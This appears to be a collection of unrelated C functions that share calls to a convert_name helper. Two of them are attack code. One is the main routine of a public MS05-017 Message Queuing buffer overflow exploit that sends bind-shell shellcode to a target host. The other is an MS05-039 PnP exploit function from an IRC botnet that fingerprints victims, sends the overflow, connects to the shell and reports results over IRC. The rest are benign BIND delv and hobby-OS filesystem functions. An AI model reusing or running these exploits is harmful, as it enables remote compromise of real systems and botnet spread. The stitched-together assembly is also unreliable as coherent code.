int main (int argc, char **argv) { unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; unsigned char *packet = NULL; unsigned short bindport; unsigned long cnt; struct sockaddr_in addr; struct hostent *he; int len, cpkt = 1; int sockfd; char recvbuf[4096]; char *buff, *ptr; #ifdef _WIN32 WSADATA wsa; #endif printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n"); printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n"); if (argc < 5) { printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]); printf("\nMSMQ ports: 2103, 2105, 2107\n"); printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n"); exit(0); } #ifdef _WIN32 WSAStartup(MAKEWORD(2,0), &wsa); #endif if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] create socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons((short)atoi(argv[2])); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2])); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed!\n"); exit(0); } printf("OK\n"); packet = dce_rpc_bind(0, endp, 1, &cnt); if (send(sockfd, packet, cnt, 0) == -1) { printf("[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 0) { printf("[-] recv failed\n"); exit(0); } free(packet); printf("[*] Attacking..."); buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff; memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1); ptr += sizeof(dce_rpc_header1)-1; // Remote NetBIOS name convert_name(ptr, argv[3]); ptr += strlen(argv[3])*2; memcpy(ptr, tag_private, sizeof(tag_private)-1); ptr += sizeof(tag_private)-1; memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1); // offsets ptr = buff; ptr += 438; memcpy(ptr, offsets, sizeof(offsets)-1); ptr += sizeof(offsets)-1; // shellcode bindport = (unsigned short)atoi(argv[4]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); buff[4170] = '\0'; buff[4171] = '\0'; if (argc == 6) cpkt = atoi(argv[5]); while (cpkt--) { printf("."); if (send(sockfd, buff, 4172, 0) == -1) { printf("\n[-] send failed\n"); exit(0); } } printf(" OK\n"); return 0; }
static isc_result_t setup_dnsseckeys(dns_client_t *client) { isc_result_t result; cfg_parser_t *parser = NULL; const cfg_obj_t *keys = NULL; const cfg_obj_t *managed_keys = NULL; cfg_obj_t *bindkeys = NULL; const char *filename = anchorfile; if (!root_validation && !dlv_validation) return (ISC_R_SUCCESS); if (filename == NULL) { #ifndef WIN32 filename = NS_SYSCONFDIR "/bind.keys"; #else static char buf[MAX_PATH]; strlcpy(buf, isc_ntpaths_get(SYS_CONF_DIR), sizeof(buf)); strlcat(buf, "\\bind.keys", sizeof(buf)); filename = buf; #endif } if (trust_anchor == NULL) { trust_anchor = isc_mem_strdup(mctx, "."); if (trust_anchor == NULL) fatal("out of memory"); } if (trust_anchor != NULL) CHECK(convert_name(&afn, &anchor_name, trust_anchor)); if (dlv_anchor != NULL) CHECK(convert_name(&dfn, &dlv_name, dlv_anchor)); CHECK(cfg_parser_create(mctx, dns_lctx, &parser)); if (access(filename, R_OK) != 0) { if (anchorfile != NULL) fatal("Unable to read key file '%s'", anchorfile); } else { result = cfg_parse_file(parser, filename, &cfg_type_bindkeys, &bindkeys); if (result != ISC_R_SUCCESS) if (anchorfile != NULL) fatal("Unable to load keys from '%s'", anchorfile); } if (bindkeys == NULL) { isc_buffer_t b; isc_buffer_init(&b, anchortext, sizeof(anchortext) - 1); isc_buffer_add(&b, sizeof(anchortext) - 1); result = cfg_parse_buffer(parser, &b, &cfg_type_bindkeys, &bindkeys); if (result != ISC_R_SUCCESS) fatal("Unable to parse built-in keys"); } INSIST(bindkeys != NULL); cfg_map_get(bindkeys, "trusted-keys", &keys); cfg_map_get(bindkeys, "managed-keys", &managed_keys); if (keys != NULL) CHECK(load_keys(keys, client)); if (managed_keys != NULL) CHECK(load_keys(managed_keys, client)); result = ISC_R_SUCCESS; if (trusted_keys == 0) fatal("No trusted keys were loaded"); if (dlv_validation) dns_client_setdlv(client, dns_rdataclass_in, dlv_anchor); cleanup: if (result != ISC_R_SUCCESS) delv_log(ISC_LOG_ERROR, "setup_dnsseckeys: %s", isc_result_totext(result)); return (result); }
static isc_result_t key_fromconfig(const cfg_obj_t *key, dns_client_t *client) { dns_rdata_dnskey_t keystruct; isc_uint32_t flags, proto, alg; const char *keystr, *keynamestr; unsigned char keydata[4096]; isc_buffer_t keydatabuf; unsigned char rrdata[4096]; isc_buffer_t rrdatabuf; isc_region_t r; dns_fixedname_t fkeyname; dns_name_t *keyname; isc_result_t result; isc_boolean_t match_root = ISC_FALSE, match_dlv = ISC_FALSE; keynamestr = cfg_obj_asstring(cfg_tuple_get(key, "name")); CHECK(convert_name(&fkeyname, &keyname, keynamestr)); if (!root_validation && !dlv_validation) return (ISC_R_SUCCESS); if (anchor_name) match_root = dns_name_equal(keyname, anchor_name); if (dlv_name) match_dlv = dns_name_equal(keyname, dlv_name); if (!match_root && !match_dlv) return (ISC_R_SUCCESS); if ((!root_validation && match_root) || (!dlv_validation && match_dlv)) return (ISC_R_SUCCESS); if (match_root) delv_log(ISC_LOG_DEBUG(3), "adding trust anchor %s", trust_anchor); if (match_dlv) delv_log(ISC_LOG_DEBUG(3), "adding DLV trust anchor %s", dlv_anchor); flags = cfg_obj_asuint32(cfg_tuple_get(key, "flags")); proto = cfg_obj_asuint32(cfg_tuple_get(key, "protocol")); alg = cfg_obj_asuint32(cfg_tuple_get(key, "algorithm")); keystruct.common.rdclass = dns_rdataclass_in; keystruct.common.rdtype = dns_rdatatype_dnskey; /* * The key data in keystruct is not dynamically allocated. */ keystruct.mctx = NULL; ISC_LINK_INIT(&keystruct.common, link); if (flags > 0xffff) CHECK(ISC_R_RANGE); if (proto > 0xff) CHECK(ISC_R_RANGE); if (alg > 0xff) CHECK(ISC_R_RANGE); keystruct.flags = (isc_uint16_t)flags; keystruct.protocol = (isc_uint8_t)proto; keystruct.algorithm = (isc_uint8_t)alg; isc_buffer_init(&keydatabuf, keydata, sizeof(keydata)); isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata)); keystr = cfg_obj_asstring(cfg_tuple_get(key, "key")); CHECK(isc_base64_decodestring(keystr, &keydatabuf)); isc_buffer_usedregion(&keydatabuf, &r); keystruct.datalen = r.length; keystruct.data = r.base; CHECK(dns_rdata_fromstruct(NULL, keystruct.common.rdclass, keystruct.common.rdtype, &keystruct, &rrdatabuf)); CHECK(dns_client_addtrustedkey(client, dns_rdataclass_in, keyname, &rrdatabuf)); trusted_keys++; cleanup: if (result == DST_R_NOCRYPTO) cfg_obj_log(key, lctx, ISC_LOG_ERROR, "no crypto support"); else if (result == DST_R_UNSUPPORTEDALG) { cfg_obj_log(key, lctx, ISC_LOG_WARNING, "skipping trusted key '%s': %s", keynamestr, isc_result_totext(result)); result = ISC_R_SUCCESS; } else if (result != ISC_R_SUCCESS) { cfg_obj_log(key, lctx, ISC_LOG_ERROR, "failed to add trusted key '%s': %s", keynamestr, isc_result_totext(result)); result = ISC_R_FAILURE; } return (result); }
int main(int argc, char *argv[]) { dns_client_t *client = NULL; isc_result_t result; dns_fixedname_t qfn; dns_name_t *query_name, *response_name; dns_rdataset_t *rdataset; dns_namelist_t namelist; unsigned int resopt, clopt; isc_appctx_t *actx = NULL; isc_taskmgr_t *taskmgr = NULL; isc_socketmgr_t *socketmgr = NULL; isc_timermgr_t *timermgr = NULL; dns_master_style_t *style = NULL; #ifndef WIN32 struct sigaction sa; #endif progname = argv[0]; preparse_args(argc, argv); argc--; argv++; isc_lib_register(); result = dns_lib_init(); if (result != ISC_R_SUCCESS) fatal("dns_lib_init failed: %d", result); result = isc_mem_create(0, 0, &mctx); if (result != ISC_R_SUCCESS) fatal("failed to create mctx"); CHECK(isc_appctx_create(mctx, &actx)); CHECK(isc_taskmgr_createinctx(mctx, actx, 1, 0, &taskmgr)); CHECK(isc_socketmgr_createinctx(mctx, actx, &socketmgr)); CHECK(isc_timermgr_createinctx(mctx, actx, &timermgr)); parse_args(argc, argv); CHECK(setup_style(&style)); setup_logging(stderr); CHECK(isc_app_ctxstart(actx)); #ifndef WIN32 /* Unblock SIGINT if it's been blocked by isc_app_ctxstart() */ memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_DFL; if (sigfillset(&sa.sa_mask) != 0 || sigaction(SIGINT, &sa, NULL) < 0) fatal("Couldn't set up signal handler"); #endif /* Create client */ clopt = DNS_CLIENTCREATEOPT_USECACHE; result = dns_client_createx2(mctx, actx, taskmgr, socketmgr, timermgr, clopt, &client, srcaddr4, srcaddr6); if (result != ISC_R_SUCCESS) { delv_log(ISC_LOG_ERROR, "dns_client_create: %s", isc_result_totext(result)); goto cleanup; } /* Set the nameserver */ if (server != NULL) addserver(client); else findserver(client); CHECK(setup_dnsseckeys(client)); /* Construct QNAME */ CHECK(convert_name(&qfn, &query_name, qname)); /* Set up resolution options */ resopt = DNS_CLIENTRESOPT_ALLOWRUN | DNS_CLIENTRESOPT_NOCDFLAG; if (no_sigs) resopt |= DNS_CLIENTRESOPT_NODNSSEC; if (!root_validation && !dlv_validation) resopt |= DNS_CLIENTRESOPT_NOVALIDATE; if (cdflag) resopt &= ~DNS_CLIENTRESOPT_NOCDFLAG; /* Perform resolution */ ISC_LIST_INIT(namelist); result = dns_client_resolve(client, query_name, dns_rdataclass_in, qtype, resopt, &namelist); if (result != ISC_R_SUCCESS) delv_log(ISC_LOG_ERROR, "resolution failed: %s", isc_result_totext(result)); for (response_name = ISC_LIST_HEAD(namelist); response_name != NULL; response_name = ISC_LIST_NEXT(response_name, link)) { for (rdataset = ISC_LIST_HEAD(response_name->list); rdataset != NULL; rdataset = ISC_LIST_NEXT(rdataset, link)) { result = printdata(rdataset, response_name, style); if (result != ISC_R_SUCCESS) delv_log(ISC_LOG_ERROR, "print data failed"); } } dns_client_freeresanswer(client, &namelist); cleanup: if (dlv_anchor != NULL) isc_mem_free(mctx, dlv_anchor); if (trust_anchor != NULL) isc_mem_free(mctx, trust_anchor); if (anchorfile != NULL) isc_mem_free(mctx, anchorfile); if (qname != NULL) isc_mem_free(mctx, qname); if (style != NULL) dns_master_styledestroy(&style, mctx); if (client != NULL) dns_client_destroy(&client); if (taskmgr != NULL) isc_taskmgr_destroy(&taskmgr); if (timermgr != NULL) isc_timermgr_destroy(&timermgr); if (socketmgr != NULL) isc_socketmgr_destroy(&socketmgr); if (actx != NULL) isc_appctx_destroy(&actx); if (lctx != NULL) isc_log_destroy(&lctx); isc_mem_detach(&mctx); dns_lib_shutdown(); return (0); }
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum ) { SOCKADDR_IN addr; int len; int sockfd; unsigned short smblen; char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; IRC* irc=(IRC*)conn; BOOL success=FALSE; char* thisTarget; int pnpbindsize=405; int TargetOS, Target; char* tOS=""; WSADATA wsa; fWSAStartup(MAKEWORD(2,0), &wsa); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; thisTarget = exinfo.ip; TargetOS=FpHost(thisTarget,FP_NP); if (TargetOS==OS_UNKNOWN) TargetOS=FpHost(thisTarget,FP_SMB); if (TargetOS == OS_WINNT){ Target=OS_WINNT; success=FALSE; }else if (TargetOS==OS_WINXP){ Target=OS_WINXP; success=FALSE; }else if (TargetOS==OS_WIN2K){ Target=OS_WIN2K; success=TRUE; }else{ success=FALSE; } ZeroMemory(&addr,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = finet_addr(thisTarget); addr.sin_port = fhtons((unsigned short)exinfo.port); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp,"\\\\%s\\IPC$",thisTarget); convert_name((char *)ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // Start prepare header -- dETOX mod -- memcpy(RPC_call + 260, Offsets[OffNum], 4); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); memcpy(ptr,bindshell,pnpbindsize-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE; frecv(sockfd, recvbuf, 4096, 0); if (!exinfo.silent && exinfo.verbose){ switch(Target){ case 1: tOS="WINNT"; break; case 2: tOS="WIN2K"; break; case 3: tOS="WINXP"; break; default: tOS="UNKNOWN/2K3/LINUX"; break; } irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip); } // if(success){ Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // } return TRUE; }
int syscall_rename(const char *a_oldpath, const char *a_newpath) { int ohandle, nhandle; int drive1, drive2; char dir_path1[512], dir_path2[512]; char name_comp1[13], name_comp2[13], conv_name1[11], conv_name2[11]; char oldpath[512], newpath[512]; struct dir_entry dent1, dent2; int exist1, exist2; struct DIR_FILE *dirf; int len1, len2; int i,t; len1 = strlen(a_oldpath); len2 = strlen(a_newpath); if (len1 > 512 || len2 > 512) return ELONGPATH; strcpy(oldpath,a_oldpath); strcpy(newpath,a_newpath); if (oldpath[len1-1] == '/' || oldpath[len1-1] == '\\') oldpath[len1-1] = '\0'; if (newpath[len2-1] == '/' || newpath[len2-1] == '\\') newpath[len2-1] = '\0'; parse_path(oldpath, &drive1, dir_path1, name_comp1); parse_path(newpath, &drive2, dir_path2, name_comp2); if (drive1 != drive2) return EDEVICE_DIFFERENT; nhandle = open_path(drive2, dir_path2); if (nhandle < 0) return nhandle; if (name_comp2[0] !='\0') { if (convert_name(name_comp2, conv_name2) < 0) { close_dir(nhandle); return EINVALIDNAME; // Error } exist2 = find_entry(nhandle, conv_name2, &dent2); } ohandle = open_path(drive1, dir_path1); if (ohandle < 0) { close_dir(nhandle); return ohandle; } if (name_comp1[0] != '\0') { if (convert_name(name_comp1, conv_name1) < 0) { close_dir(nhandle); close_dir(ohandle); return EINVALIDNAME; // Error } exist1 = find_entry(ohandle, conv_name1, &dent1); } // Check whether new path exists and is removable if ((exist2 == 1) && ((dent2.attrib & FTYPE_READONLY) || ((dent2.attrib & FTYPE_DIR) && (empty_dir(nhandle, &dent2) != 1)))) { close_dir(nhandle); close_dir(ohandle); return ETARGET_EXISTS; } // Check if source exists and is movable if (exist1 != 1) { close_dir(nhandle); close_dir(ohandle); return EPATH_NOT_EXISTS; } if ((dent1.attrib & FTYPE_READONLY) != 0) { close_dir(nhandle); close_dir(ohandle); return EREADONLY; } // Check whether oldpath is not a subpath of newpath if ((dent1.attrib & FTYPE_DIR) && (ohandle != nhandle)) { t = nhandle; dirf = &dir_file_list[t]; while (dirf->parent_index >= 0 && dirf->parent_index != ohandle) { t = dirf->parent_index; dirf = &dir_file_list[t]; } if (dirf->parent_index == ohandle) { close_dir(nhandle); close_dir(ohandle); return EOLDPATH_PARENT_OF_NEWPATH; } } // Check if newpath already exists whether it is compatible or not if ((exist2 == 1) && (((dent1.attrib & FTYPE_DIR) != 0 && (dent2.attrib & FTYPE_DIR) == 0) || ((dent1.attrib & FTYPE_DIR) == 0 && (dent2.attrib & FTYPE_DIR) != 0))) { close_dir(nhandle); close_dir(ohandle); return ESRC_DEST_NOT_SAME_TYPE; } // Remove destination entry if exists if (exist2 == 1) { if (dent2.attrib & FTYPE_DIR) syscall_rmdir(newpath); else syscall_unlink(newpath); } // Add the source dir entry after changing the name // to destination directory bcopy( (char *)&dent1, (char *)&dent2, sizeof(struct dir_entry)); for (i=0; i<11; i++) // Both name and extension dent2.name[i] = conv_name2[i]; t = add_dir_entry(nhandle, &dent2); if (t == 1) { delete_dir_entry(ohandle, dent1.name); } // Close the handles of parent directories close_dir(ohandle); close_dir(nhandle); if (t == 1) return 0; else return t; }